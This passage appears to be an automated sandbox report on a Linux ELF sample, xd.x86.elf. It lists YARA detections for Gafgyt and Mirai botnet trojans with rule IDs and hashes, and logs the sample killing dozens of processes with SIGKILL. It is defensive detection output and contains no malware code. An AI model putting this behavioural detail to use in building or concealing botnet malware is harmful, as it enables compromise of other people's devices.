Source: Process Memory Space: xd.x86.elf PID: 6246, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: Process Memory Space: xd.x86.elf PID: 6247, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: xd.x86.elf PID: 6247, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: Process Memory Space: xd.x86.elf PID: 6249, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: xd.x86.elf PID: 6249, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown

Sample tries to kill multiple processes (SIGKILL)

Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 936, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 491, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 720, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 721, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 759, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 761, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 772, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 774, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 777, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 785, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 788, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 789, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 793, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 797, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 1334, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 1335, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 1344, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 1860, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 1872, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 1886, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 2009, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 2048, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 6067, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 6222, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 6223, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 6341, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 6349, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 6378, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6242)	SIGKILL sent: pid: -6242, result: unknown	Jump to behavior

Source: LOAD without section mappings

Program segment: 0xc01000

Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 936, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 491, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 720, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 721, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 759, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 761, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 772, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 774, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 777, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 785, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 788, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 789, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 793, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 797, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 1334, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 1335, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 1344, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 1860, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 1872, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 1886, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 2009, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 2048, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 6067, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 6222, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 6223, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 6341, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 6349, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	SIGKILL sent: pid: 6378, result: successful	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6242)	SIGKILL sent: pid: -6242, result: unknown	Jump to behavior

Source: 6247.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6247.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6247.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
Source: 6247.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6247.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_93fc3657 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d01a9e85a01fad913ca048b60bda1e5a2762f534e5308132c1d3098ac3f561ee, id = 93fc3657-fd21-4e93-a728-c084fc0a6a4a, last_modified = 2021-09-16
Source: 6247.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_804f8e7c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 1080d8502848d532a0b38861437485d98a41d945acaf3cb676a7a2a2f6793ac6, id = 804f8e7c-4786-42bc-92e4-c68c24ca530e, last_modified = 2021-09-16
Source: 6247.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_99d78950 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3008edc4e7a099b64139a77d15ec0e2c3c1b55fc23ab156304571c4d14bc654c, id = 99d78950-ea23-4166-a85a-7a029209f5b1, last_modified = 2021-09-16
Source: 6247.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_aa39fb02 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = b136ba6496816ba9737a3eb0e633c28a337511a97505f06e52f37b38599587cb, id = aa39fb02-ca7e-4809-ab5d-00e92763f7ec, last_modified = 2021-09-16
Source: 6247.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_a68e498c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 951c9dfcba531e5112c872395f6c144c4bc8b71c666d2c7d9d8574a23c163883, id = a68e498c-0768-4321-ab65-42dd6ef85323, last_modified = 2021-09-16
Source: 6247.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6247.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
Source: 6247.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6247.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6247.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6247.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: 6249.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6249.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6249.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
Source: 6249.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6249.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_93fc3657 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d01a9e85a01fad913ca048b60bda1e5a2762f534e5308132c1d3098ac3f561ee, id = 93fc3657-fd21-4e93-a728-c084fc0a6a4a, last_modified = 2021-09-16
Source: 6249.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_804f8e7c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 1080d8502848d532a0b38861437485d98a41d945acaf3cb676a7a2a2f6793ac6, id = 804f8e7c-4786-42bc-92e4-c68c24ca530e, last_modified = 2021-09-16
Source: 6249.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_99d78950 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3008edc4e7a099b64139a77d15ec0e2c3c1b55fc23ab156304571c4d14bc654c, id = 99d78950-ea23-4166-a85a-7a029209f5b1, last_modified = 2021-09-16
Source: 6249.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_aa39fb02 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = b136ba6496816ba9737a3eb0e633c28a337511a97505f06e52f37b38599587cb, id = aa39fb02-ca7e-4809-ab5d-00e92763f7ec, last_modified = 2021-09-16
Source: 6249.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_a68e498c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 951c9dfcba531e5112c872395f6c144c4bc8b71c666d2c7d9d8574a23c163883, id = a68e498c-0768-4321-ab65-42dd6ef85323, last_modified = 2021-09-16
Source: 6249.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6249.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
Source: 6249.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6249.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6249.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6249.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: 6239.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6239.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6239.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
Source: 6239.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6239.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_93fc3657 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d01a9e85a01fad913ca048b60bda1e5a2762f534e5308132c1d3098ac3f561ee, id = 93fc3657-fd21-4e93-a728-c084fc0a6a4a, last_modified = 2021-09-16
Source: 6243.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6243.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6243.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
Source: 6243.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6243.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_93fc3657 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d01a9e85a01fad913ca048b60bda1e5a2762f534e5308132c1d3098ac3f561ee, id = 93fc3657-fd21-4e93-a728-c084fc0a6a4a, last_modified = 2021-09-16
Source: 6243.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_804f8e7c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 1080d8502848d532a0b38861437485d98a41d945acaf3cb676a7a2a2f6793ac6, id = 804f8e7c-4786-42bc-92e4-c68c24ca530e, last_modified = 2021-09-16
